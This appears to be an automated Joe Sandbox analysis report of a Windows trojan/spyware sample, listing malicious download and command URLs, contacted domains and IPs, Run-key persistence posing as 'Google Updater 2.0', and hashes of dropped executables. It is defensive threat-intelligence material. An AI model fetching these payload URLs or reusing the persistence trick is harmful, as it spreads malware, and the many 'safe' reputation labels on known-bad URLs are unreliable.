https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://rusianlover.icu/forum/logout.php?page=1	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=9885598	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?pid=438	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=9557666	0%	Avira URL Cloud	safe
http://estrelladamm.icu/old/get.php	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=2442663t	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=8085154	0%	Avira URL Cloud	safe
http://ocsp.digicert	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=2442663	0%	Avira URL Cloud	safe
https://l0ioz.icu/pub/bin.exe	100%	Avira URL Cloud	malware
http://rusianlover.icu/forum/logout.php?id=2140088	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=7086675	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://estrelladamm.icu/old/GetDataAVK.exe2	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?page=83	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=3125771	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?pid=567	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?pid=925	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=1106076	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?id=9292886	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
zakriasons.co	104.21.55.228	true	true	4%, Virustotal, Browse	unknown
estrelladamm.icu	8.210.47.214	true	true	2%, Virustotal, Browse	unknown
rusianlover.icu	212.114.52.43	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://rusianlover.icu/forum/logout.php?id=1809723	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?page=7	true	Avira URL Cloud: safe	unknown
http://estrelladamm.icu/old/GetDataAVK.exe	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=5263631	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?page=1	true	Avira URL Cloud: safe	unknown
http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=9885598	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?pid=438	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=9557666	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=8085154	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=2442663	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=2140088	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=7086675	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?page=83	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=3125771	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?pid=567	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?pid=925	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=1106076	true	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=9292886	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://estrelladamm.icu/get.php__vbaVarSetVar	explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	false		high
https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1	explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	false		high
http://estrelladamm.icu/old/get.php	explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://rusianlover.icu/forum/logout.php?id=2442663t	explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mi	powershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.digicert	explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://l0ioz.icu/pub/bin.exe	explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	false		high
http://estrelladamm.icu/old/GetDataAVK.exe2	explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.55.228	zakriasons.co	United States	13335	CLOUDFLARENETUS	true
212.114.52.43	rusianlover.icu	Germany	30823	COMBAHTONcombahtonGmbHDE	true
8.210.47.214	estrelladamm.icu	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	366082
Start date:	10.03.2021
Start time:	11:41:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 45s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Documento--SII--33875.bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	12
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@26/13@35/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 69.9% (good quality ratio 66.5%) Quality average: 85.3% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 23.57.80.111, 13.88.21.125, 51.11.168.160, 52.137.90.34, 104.42.151.234, 205.185.216.10, 205.185.216.42, 51.103.5.186, 92.122.213.247, 92.122.213.194, 104.43.139.144, 20.54.26.129, 51.104.139.180, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, windowsupdate.redir.update.microsoft.com.nsatc.net, redir.update.microsoft.com.nsatc.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, windowsupdate.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:41:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
11:42:00	API Interceptor	12x Sleep call for process: CpSHySoEfzH.exe modified
11:42:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
11:42:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
11:42:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
11:42:28	API Interceptor	31x Sleep call for process: explorer.exe modified
11:42:32	API Interceptor	1x Sleep call for process: iom7q73oi.exe modified
11:42:35	API Interceptor	77x Sleep call for process: powershell.exe modified
11:42:35	Autostart	Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.55.228	OnZH4ftMLU.exe	Get hash	malicious	Browse	zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe
212.114.52.43	OnZH4ftMLU.exe	Get hash	malicious	Browse	rusianlover.icu/forum/logout.php
8.210.47.214	OnZH4ftMLU.exe	Get hash	malicious	Browse	estrelladamm.icu/old/GetDataAVK.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
rusianlover.icu	OnZH4ftMLU.exe	Get hash	malicious	Browse	212.114.52.43
estrelladamm.icu	OnZH4ftMLU.exe	Get hash	malicious	Browse	8.210.47.214
zakriasons.co	OnZH4ftMLU.exe	Get hash	malicious	Browse	104.21.55.228

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	OnZH4ftMLU.exe	Get hash	malicious	Browse	8.210.47.214
	subscription_1615310237.xls	Get hash	malicious	Browse	8.209.66.127
	subscription_1615310237.xls	Get hash	malicious	Browse	8.209.66.127
	document-1317854575.xls	Get hash	malicious	Browse	8.210.31.137
	document-1317854575.xls	Get hash	malicious	Browse	8.210.31.137
	COSCO Arrival Notice with Shipping CBHU9101943.xlsx	Get hash	malicious	Browse	8.209.68.209
	Setup.exe	Get hash	malicious	Browse	8.210.66.206
	Setup.exe	Get hash	malicious	Browse	8.210.66.206
	subscription_1614969542.xls	Get hash	malicious	Browse	8.209.66.127
	subscription_1614969542.xls	Get hash	malicious	Browse	8.209.66.127
	virus.xls	Get hash	malicious	Browse	8.208.97.177
	virus.xls	Get hash	malicious	Browse	8.208.97.177
	0304_87496944093261.doc	Get hash	malicious	Browse	47.254.131.254
	0304_56958375050481.doc	Get hash	malicious	Browse	47.254.131.254
	Static.dll	Get hash	malicious	Browse	47.254.131.254
	Static.dll	Get hash	malicious	Browse	47.254.131.254
	msals.dll	Get hash	malicious	Browse	47.254.131.254
	document-1996534889.xls	Get hash	malicious	Browse	8.209.68.209
	document-1996534889.xls	Get hash	malicious	Browse	8.209.68.209
	0303_15995446253021.doc	Get hash	malicious	Browse	47.254.131.254
COMBAHTONcombahtonGmbHDE	OnZH4ftMLU.exe	Get hash	malicious	Browse	212.114.52.43
	Sales Order confirmation_pdf.exe	Get hash	malicious	Browse	152.89.247.27
	Purchase Order (2).exe	Get hash	malicious	Browse	152.89.247.74
	Bestellung Nr. 20210038.exe	Get hash	malicious	Browse	152.89.247.75
	SecuriteInfo.com.Variant.Razy.849114.20596.exe	Get hash	malicious	Browse	91.200.103.83
	uitTYe3ZE5EMN3Z.exe	Get hash	malicious	Browse	45.154.4.68
	mn9VCjzNP8ATu3F.exe	Get hash	malicious	Browse	45.154.4.68
	Aa7MaN2ae5.exe	Get hash	malicious	Browse	45.138.172.158
	1RevKocjWoyhJ3y.exe	Get hash	malicious	Browse	45.154.4.68
	Fichero19837123.txt.LNK	Get hash	malicious	Browse	45.138.172.29
	Fichero19837123.txt.LNK	Get hash	malicious	Browse	45.138.172.29
	rq0CWAh0pA.exe	Get hash	malicious	Browse	160.20.147.195
	InvoiceApplication.exe	Get hash	malicious	Browse	45.147.229.44
	item list _ pdf.exe	Get hash	malicious	Browse	160.20.147.107
	10.dll	Get hash	malicious	Browse	185.234.72.84
	UbrikQvjSc.exe	Get hash	malicious	Browse	152.89.247.27
	Invoice copy and Payment request.xlsx	Get hash	malicious	Browse	152.89.247.30
	counters.dll	Get hash	malicious	Browse	45.155.173.242
	OzRW6h38aL.dll	Get hash	malicious	Browse	45.155.173.242
	1d46a419ae040e2c284ce365d66c8971.exe	Get hash	malicious	Browse	45.154.4.68
CLOUDFLARENETUS	WcihqRt2vr.exe	Get hash	malicious	Browse	104.21.6.117
	tToCMQdejt.exe	Get hash	malicious	Browse	104.21.3.86
	m5bCbJdk7l.exe	Get hash	malicious	Browse	104.21.1.113
	6uRm50MU0l.exe	Get hash	malicious	Browse	23.227.38.74
	kw8VTJCVE6.exe	Get hash	malicious	Browse	23.227.38.74
	OnZH4ftMLU.exe	Get hash	malicious	Browse	104.21.55.228
	Payment.exe	Get hash	malicious	Browse	172.67.174.240
	Pro-doma 209901.exe	Get hash	malicious	Browse	172.67.188.154
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	162.159.134.233
	PO_20210310.exe	Get hash	malicious	Browse	172.67.215.201
	bpMiLDP382.exe	Get hash	malicious	Browse	104.17.63.50
	CF10550U5400-PDF.exe	Get hash	malicious	Browse	162.159.135.233
	PO#5666HGS_pdf.exe	Get hash	malicious	Browse	104.21.19.200
	CF10550U5400-PDF.exe	Get hash	malicious	Browse	162.159.134.233
	PAYMENT SWIFT.exe	Get hash	malicious	Browse	104.21.19.200
	103_FT21068D79MB_0770989439.exe	Get hash	malicious	Browse	104.21.19.200
	DIEN CHUYEN TIEN 09.03.2020.exe	Get hash	malicious	Browse	172.67.188.154
	Purchase Order.80078.Scan.pdf....exe	Get hash	malicious	Browse	172.67.188.154
	H#U00f3a #U0111#U01a1n chi#U1ebfu l#U1ec7 PO # 79574.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	DOC 875674656-674667636.exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
57f3642b4e37e28f5cbe3020c9331b4c	OnZH4ftMLU.exe	Get hash	malicious	Browse	104.21.55.228
	yytr.dll	Get hash	malicious	Browse	104.21.55.228
	vG4U0RKFY2.exe	Get hash	malicious	Browse	104.21.55.228
	evil.doc	Get hash	malicious	Browse	104.21.55.228
	davay (2).exe	Get hash	malicious	Browse	104.21.55.228
	davay.exe	Get hash	malicious	Browse	104.21.55.228
	https://notification1.bubbleapps.io/version-test?debug_mode=true	Get hash	malicious	Browse	104.21.55.228
	https://secureddoc.unicornplatform.com	Get hash	malicious	Browse	104.21.55.228
	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	104.21.55.228
	5fd885c499439tar.dll	Get hash	malicious	Browse	104.21.55.228
	https://secureddoc.unicornplatform.com/	Get hash	malicious	Browse	104.21.55.228
	http://contoubi00.epizy.com/ubi/	Get hash	malicious	Browse	104.21.55.228
	https://secureddoc.unicornplatform.com	Get hash	malicious	Browse	104.21.55.228
	http://vcomdesign.com	Get hash	malicious	Browse	104.21.55.228
	https://aud-amplified.unicornplatform.com/	Get hash	malicious	Browse	104.21.55.228
	https://cloud.vectorworks.net/links/11eb34bf3e0b15d489a10aa721e465bf	Get hash	malicious	Browse	104.21.55.228
	https://dynalist.io/d/TcKkPvWijzGN4uv-0OCmM26A	Get hash	malicious	Browse	104.21.55.228
	https://app.nihaocloud.com/f/06096e5837654796a4d4/	Get hash	malicious	Browse	104.21.55.228
	https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.html	Get hash	malicious	Browse	104.21.55.228
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	104.21.55.228

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	OnZH4ftMLU.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe	OnZH4ftMLU.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	5.351662875791918
Encrypted:	false
SSDEEP:	24:3vQPpQrLAo4KAxX5qRPD42HOoVZnCvK39tCKnKJRSF8PQ9eF:oPerB4nqRL/HvfnCvO9tC4aR48Y9eF
MD5:	AC10FD09E6BB46F1ECB6FBBBC32BECA8
SHA1:	42C9BEBF04464BDF77CEF33ECE377F66832C2BCE
SHA-256:	0656EAD501AA0E11A199F00BAF5C6367BBD44FF736D8A4277C19FF6E27454492
SHA-512:	4F01D2DB224F17759BC03AEE508A732348AF43120FBA61107D11BE37399182D4CDFB6773D0A7E7F2B27FA1A9AC78395889D08DC8381DC995EAB322215DF8BEBB
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852996
Entropy (8bit):	5.888594490665969
Encrypted:	false
SSDEEP:	24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
MD5:	2CED2C14EECE71C72C5E45E8A607BB4C
SHA1:	13A700A297A7E5697D69BB743C3B256AC10A14E2
SHA-256:	4EFD9A3FA2D25D6706213FEB3299DD0F73777AAD01217B9E3DF046064FDBBB7E
SHA-512:	199CB38D7F20F64B30D2CB2BA56DAB6C0D3B2685D85A990C085060752071B9620D131C5C25BBA9B3140C9816AE3515D6B7DBF794D3DD71DB15BB8D3F4EB04F06
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].......................r.................................Rich...........................PE..L....BC`.....................p......C.............@.............................................................................(....................................................................................................................rdaals2.p...............................text............................... ..`.rdata..43.......@..................@..@.data............0..................@....idata..............................@....rsrc................ ..............@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78 Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:P:P
MD5:	DF108E9C42B3E9FC686EA496455DDCCA
SHA1:	9C6589C0729B36D7D1DCF11E6CCE1EB22E682450
SHA-256:	B6D6A7E37E23E7A65E964BC982979CEB94AB98A49FCCF77CB888388FAFA974EB
SHA-512:	CF22BC1802EDFAB355CD89B31B4DCF1B635A8617C56BCF7FE56E3C3883C27D0C67B799434E243A27ACC766234BF85B3118F863ADB66EC617AB9B8E780730C7A8
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asikjyeb.4ye.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkdwgbaz.aea.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5a4in0.j2z.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1k4j5qt.gnv.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	680448
Entropy (8bit):	7.109386979695027
Encrypted:	false
SSDEEP:	12288:yjw3mhs2SwibEO3GplmjwyFFubW87S3/C/OeEzoWJHVazmcDV:yjw3mYwibEO3GplmjwyFFubx7P/cLPah
MD5:	50803BDBA827E6AE4600DA26B5E81800
SHA1:	E3650665DD57B79514D33FE8E8D8FF8429B52C55
SHA-256:	02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
SHA-512:	C641B6937D93B76E592F69B35D8E0F8236C985A56BAE41B78FCA29A1B6F16F2C75FB25941D6957A1E761A64D66ACBDF9673CF13434D3CC6F7901904105E19C50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: OnZH4ftMLU.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....XH`..............0..X...........v... ........@.. ....................................@.................................tv..W....................................u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H...........................p............................................(......{...."..}....J..(........(.......0.............s.....+....{...."..}....6.....(.......0..L.......s........}.......(.......,..{.......+...., ...o...........s....(...+(.......0.............s.....+......0...............s.....+....0............o.....o......s.....+..".(.....n.o....-...{....o.......+....{...."..}......{ ..."..} .....{!..."..}!.....{"..."..}".....{#..."..}#...2....

C:\Users\user\AppData\Local\Temp\iom7q73oi.exe Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	4.490313118475907
Encrypted:	false
SSDEEP:	384:3GoUMQDhfWbKwaDwGYSk+RAno78NvcWceLMsT98or1GcB91EITQB4XWW0egcbAcQ:3khVwggo78NcWc8MsT9d1GcfhMJWzBG
MD5:	08CDFD0D3A406601C42F087DA16EC6C8
SHA1:	48FD8EEF568D2372E2A883283E58E5DEF81FEF07
SHA-256:	EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253
SHA-512:	D522FC9C5815C93A1DC114C63DB53879346E435397CAD79A105A412CB18459335A1BFC3CFC9E7F6469CD703E2014538AA3C649442B80214A945E76ED50D26940
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: OnZH4ftMLU.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...........6......5.....t5.....Rich.*..................PE..L.....G`..................... ....................@.................................L...........................................(...........................................................................0... ....................................text....w.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
